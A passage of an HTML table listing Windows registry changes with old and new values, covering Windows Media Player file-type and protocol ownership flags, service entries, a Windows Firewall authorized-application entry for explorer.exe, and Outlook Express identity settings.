<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp2v</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpa</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpe</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.mpv2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.rmi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.snd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wax</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wm</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wma</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmv</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wmz</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wpl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Extensions\.wvx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/vnd.ms-wpl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-mplayer2</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\application/x-ms-wmz</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/basic</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpegurl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-aiff</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-midi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mp3</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpegurl</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wax</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-ms-wma</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\audio/x-wav</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\midi/mid</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/avi</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/mpg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/msvideo</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-mpeg2a</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-asf-plugin</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wm</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmv</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wmx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-ms-wvx</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\MIME Types\video/x-msvideo</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mms</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmst</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\mmsu</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Multimedia\WMPlayer\Protocols\msbd</span></td>
<td><span style="color: black; font-size: xx-small;">UserApprovedOwning</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"yes"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19</span></td>
<td><span style="color: black; font-size: xx-small;">RefCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RASMAN\0000\Control</span></td>
<td><span style="color: black; font-size: xx-small;">ActiveService</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"RasMan"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control</span></td>
<td><span style="color: black; font-size: xx-small;">ActiveService</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"TapiSrv"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch</span></td>
<td><span style="color: black; font-size: xx-small;">Epoch</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">VerStamp</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpellDontIgnoreDBCS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">MSIMN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">StoreMigratedV5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">ConvertedToDBX</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Settings Upgraded</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Running</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Store Root</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerDlgPos</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerTack</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Compact Check Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
